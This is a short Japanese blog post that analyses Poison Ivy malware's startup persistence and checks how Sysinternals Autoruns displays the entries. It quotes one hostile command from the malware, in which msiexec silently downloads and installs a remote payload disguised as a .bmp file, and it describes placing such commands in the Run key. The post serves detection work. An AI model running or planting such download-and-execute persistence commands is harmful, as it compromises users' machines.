Poison Ivy と MSIEXEC
8/23 に Fortinet から Poison Ivy に関する下記レポートが出ています。
自動起動の仕組みとしては、スタートアップに VBS ファイルを登録する方式になっています。登録された VBS ファイルはピンクハイライトになる為、Autoruns であれば簡単に見分ける事ができます。
VBS ファイルの内容は、上記記事の「Figure 4. Thumb.vbs in the Startup folder and its content」スクリーンショットで内容を確認できます。興味深い点としては、下記のように msiexec のパラメータとして URL が記述されている点です。(IPアドレス部分は変更しています)
"cmd.exe /c msiexec /q /i http://192.168.0.1/images/Thumbs.bmp"
例えば、このコマンドが Run キーに登録されている場合にはどうなるのでしょうか?
Run キーに検証する値を登録します。
Autorunsで確認してみます。
項目を選択し、引数を確認すれば URL が指定されている事を確認できます。
更に実験として Example2 を Run キーに登録してみます。(この様な登録方法が実際に動作するかは確認していません)
Autorunsで確認してみます。
結果としては黄色ハイライトになるようですね。